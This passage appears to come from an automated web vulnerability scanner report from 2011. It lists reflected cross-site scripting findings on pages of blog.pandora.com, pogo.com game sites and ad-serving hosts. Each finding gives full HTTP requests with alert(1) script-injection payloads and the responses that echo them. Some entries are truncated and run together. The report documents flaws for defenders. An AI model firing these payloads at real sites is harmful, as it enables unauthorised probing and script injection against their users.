GET /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1c19<script>alert(1)</script>6a443b18f71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1051<script>alert(1)</script>6df0b546c02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6f7<script>alert(1)</script>7fd9127d43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d65d<script>alert(1)</script>64c6f95a91f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.dimension.js8d65d<script>alert(1)</script>64c6f95a91f was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea349<script>alert(1)</script>9480ff2f53c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea349<script>alert(1)</script>9480ff2f53c/jquery.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ffb3<script>alert(1)</script>60fe94bbc36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 341
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/jquery.js9ffb3<script>alert(1)</script>60fe94bbc36 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a52fa<script>alert(1)</script>042e399b16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa52fa<script>alert(1)</script>042e399b16b/menuManager.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fdcd4<script>alert(1)</script>10f75eed66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 346
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/menuManager.jsfdcd4<script>alert(1)</script>10f75eed66c was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a34c<script>alert(1)</script>3ef283336f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2a34c<script>alert(1)</script>3ef283336f1/styles-site.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5dd40<script>alert(1)</script>d3e39760b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/pandora/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/styles-site.css5dd40<script>alert(1)</script>d3e39760b37 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 711ea<script>alert(1)</script>7529f0abeb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /press711ea<script>alert(1)</script>7529f0abeb0 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /press711ea<script>alert(1)</script>7529f0abeb0 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98567<script>alert(1)</script>eadbbafd7b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show98567<script>alert(1)</script>eadbbafd7b9 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:07:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 328
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show98567<script>alert(1)</script>eadbbafd7b9 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 33cf5<script>alert(1)</script>c76f8eb676e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /show33cf5<script>alert(1)</script>c76f8eb676e/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 329
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /show33cf5<script>alert(1)</script>c76f8eb676e/ was not found on this server.</p> ...[SNIP]...
3.462. http://board-games.pogo.com/games/monopoly [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://board-games.pogo.com
Path:
/games/monopoly
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade82"><script>alert(1)</script>96953023051 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/monopoly?ade82"><script>alert(1)</script>96953023051=1 HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://board-games.pogo.com/games/monopoly?ade82"><script>alert(1)</script>96953023051=1"/> ...[SNIP]...
3.463. http://board-games.pogo.com/games/online-chess [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://board-games.pogo.com
Path:
/games/online-chess
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cb8"><script>alert(1)</script>7fe9a271473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/online-chess?95cb8"><script>alert(1)</script>7fe9a271473=1 HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook. ...[SNIP]... <link rel="canonical" href="http://board-games.pogo.com/games/online-chess?95cb8"><script>alert(1)</script>7fe9a271473=1"/> ...[SNIP]...
3.464. http://board-games.pogo.com/games/risk [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://board-games.pogo.com
Path:
/games/risk
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d31f"><script>alert(1)</script>879217c7909 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/risk?6d31f"><script>alert(1)</script>879217c7909=1 HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the ifl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345c3"%3balert(1)//496dcbce961 was submitted in the ifl parameter. This input was echoed as 345c3";alert(1)//496dcbce961 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$345c3"%3balert(1)//496dcbce961&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
3.466. http://card-games.pogo.com/games/rainy-day-spider-solitaire [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://card-games.pogo.com
Path:
/games/rainy-day-spider-solitaire
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91aec"><script>alert(1)</script>ee1969806b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/rainy-day-spider-solitaire?91aec"><script>alert(1)</script>ee1969806b9=1 HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload b8b5e<script>alert(1)</script>ec2a9508206 was submitted in the offerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941b8b5e<script>alert(1)</script>ec2a9508206&type=3&subid=0&tmpid=1826 HTTP/1.1 Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Length: 263 Date: Sun, 09 Jan 2011 02:07:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body> Bad number format in offerid: For input string: "78941b8b5e<script>alert(1)</script>ec2a9508206" </body> ...[SNIP]...
